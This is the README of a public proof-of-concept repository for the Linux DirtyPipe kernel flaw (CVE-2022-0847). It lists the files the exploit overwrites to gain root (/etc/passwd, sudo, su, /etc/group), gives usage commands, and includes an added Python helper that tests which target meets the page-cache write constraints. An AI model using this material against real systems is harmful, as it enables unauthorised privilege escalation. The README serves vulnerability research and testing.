
A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell

crusoe112/DirtyPipePython

dirty.py

Description

This is an exploit for the Linux kernel vulnerability CVE-2022-0847 (DirtyPipe), discovered by Max Kellermann.

This code combines two existing DirtyPipe POCs into one:

  • febinrev's POC
    • Overwrites the sudo binary to directly pop a root shell
  • eremus-dev's POC
    • A direct port of Kellermann's POC to Python

This code checks, in order, whether:

  • /etc/passwd can be overwritten to get a root shell
  • The sudo binary can be overwritten to get a root shell
  • The su binary can be overwritten to get a root shell
  • The current user can be added to the sudo group in /etc/group

It then uses the first target that is feasible, in that order, and drops the user directly into a root shell.
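The target selection above is the part of the script that decides what is even attempted. As an added illustration (this is not code from the repository), the following Python encodes the ordered candidate walk together with the constraints the DirtyPipe primitive imposes on any write, as described in Kellermann's writeup: the file must be readable by the current user (splice needs a read descriptor on it), the write offset must not sit on a page boundary (at least one byte of the page has to be spliced into the pipe first), the payload must stay inside that page, and the write cannot grow the file. The passwd and group contents, the temporary files, the 1-byte placeholder payloads and the helper names `check_target`, `pick_target` and `build_demo` are all constructed for this example; no real system file is touched.

```python
"""Feasibility checks for DirtyPipe targets, in the README's order.

Added example, not part of crusoe112/DirtyPipePython. The four constraints
in check_target() are the ones from Kellermann's writeup; everything else
(file contents, offsets, payloads, names) is constructed for illustration.
"""
import mmap
import os
import tempfile

PAGE_SIZE = mmap.PAGESIZE  # page-cache granularity the primitive works in
ORDER = ("passwd", "sudo", "su", "group")  # same order the README tries


def check_target(path, offset, data, page_size=PAGE_SIZE):
    """Return (ok, reason) for writing `data` at `offset` of `path`.

    A candidate is only usable if all four constraints hold; the reason
    string says which one failed so the caller can report it.
    """
    if not data or len(data) >= page_size:
        return False, "payload must be between 1 and page_size-1 bytes"
    try:
        size = os.stat(path).st_size
    except OSError as exc:
        return False, "cannot stat target: %s" % exc.strerror
    if not os.access(path, os.R_OK):
        return False, "target is not readable (splice needs a read fd)"
    if offset < 0 or offset % page_size == 0:
        return False, "offset must not be on a page boundary"
    if offset % page_size + len(data) > page_size:
        return False, "write would cross a page boundary"
    if offset + len(data) > size:
        return False, "write would extend the file"
    return True, "ok"


def pick_target(candidates, only=None):
    """Walk the candidates in ORDER (or just `only`, like --target).

    `candidates` maps a target name to (path, offset, payload).
    Returns (name_of_first_feasible_target_or_None, {name: reason}).
    """
    names = (only,) if only else ORDER
    reasons = {}
    for name in names:
        if name not in candidates:
            continue
        path, offset, data = candidates[name]
        ok, why = check_target(path, offset, data)
        reasons[name] = why
        if ok:
            return name, reasons
    return None, reasons


# Constructed stand-ins for /etc/passwd and /etc/group (not real system files).
CONSTRUCTED_PASSWD = (b"root:x:0:0:root:/root:/bin/bash\n"
                      b"vulnerable:x:1000:1000::/home/vulnerable:/bin/bash\n")
CONSTRUCTED_GROUP = b"root:x:0:\nsudo:x:27:\n"


def build_demo(tmpdir=None):
    """Create constructed target files and return a candidate table.

    Each entry is built so that exactly one of the constraints decides it:
    passwd is feasible, sudo is missing, su is a fake binary whose chosen
    offset lands on a page boundary, and group would need to grow the file.
    """
    tmpdir = tmpdir or tempfile.mkdtemp(prefix="dirtypipe_demo_")
    passwd = os.path.join(tmpdir, "passwd")
    group = os.path.join(tmpdir, "group")
    su = os.path.join(tmpdir, "su")
    with open(passwd, "wb") as fh:
        fh.write(CONSTRUCTED_PASSWD)
    with open(group, "wb") as fh:
        fh.write(CONSTRUCTED_GROUP)
    with open(su, "wb") as fh:
        fh.write(b"\x7fELF" + b"\x00" * (2 * PAGE_SIZE - 4))  # two pages of filler
    # Offset of the 'x' in "root:x:" and a 1-byte placeholder payload.
    root_field = CONSTRUCTED_PASSWD.index(b"root:x:") + len(b"root:")
    # Offset just past "sudo:x:27:"; appending a name here would grow the file.
    sudo_line_end = CONSTRUCTED_GROUP.index(b"sudo:x:27:") + len(b"sudo:x:27:")
    return {
        "passwd": (passwd, root_field, b"y"),
        "sudo": (os.path.join(tmpdir, "sudo"), 1, b"\x90"),  # deliberately absent
        "su": (su, PAGE_SIZE, b"\x90"),                        # page-aligned offset
        "group": (group, sudo_line_end, b"vulnerable"),         # past end of file
    }


if __name__ == "__main__":
    cands = build_demo()
    chosen, reasons = pick_target(cands)
    for name in ORDER:
        print("%-7s %s" % (name, reasons.get(name, "not tried")))
    print("would use:", chosen)
```

Running it prints one line per target with the reason it was accepted or skipped, which is the check a practitioner wants before a POC touches a page-cache page of a real setuid binary: a payload that crosses a page or starts on a page boundary simply does not land, and the script falls through to the next target.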

For an excellent explanation of the vulnerability itself, see Kellermann's writeup.

Getting Started

Requires Python 3.10 or newer, because the script uses os.splice (added to the os module in 3.10).

Usage

usage: dirty.py [-h] [--target {passwd,group,sudo,su}]

Use dirty pipe vulnerability to pop root shell

options:
  -h, --help            show this help message and exit
  --target {passwd,group,sudo,su}
                        The target read-only file to overwrite

Examples

Try all targets until one works

vulnerable@kali:~$ python dirty.py

Try a specific target

vulnerable@kali:~$ python dirty.py --target passwd

Cleanup

The script may write several files to /tmp:

  • /tmp/backup_sudo
  • /tmp/backup_su
  • /tmp/passwd
  • /tmp/sh
  • /tmp/group

These files should be removed after the script has run; some of them are created by the root process, so deleting them may require root access.

Dealing with errors

This exploit overwrites a page of the target file in the page cache, not the file on disk: the modified page is never marked dirty, so it is not written back, and the original contents reappear once the page is evicted from the cache. If something looks corrupted or the script errors out, you usually only need to wait until the cached page is dropped, or reboot, to undo the change. The one caveat is that a legitimate write to the same file while the altered page is still cached could carry the altered bytes to disk, so do not run this against files you cannot restore. That being said, I bear no responsibility for damage done by this code, so please read carefully and hack responsibly. Be sure to check out Max Kellermann's writeup at cm4all.com as well.

Acknowledgements
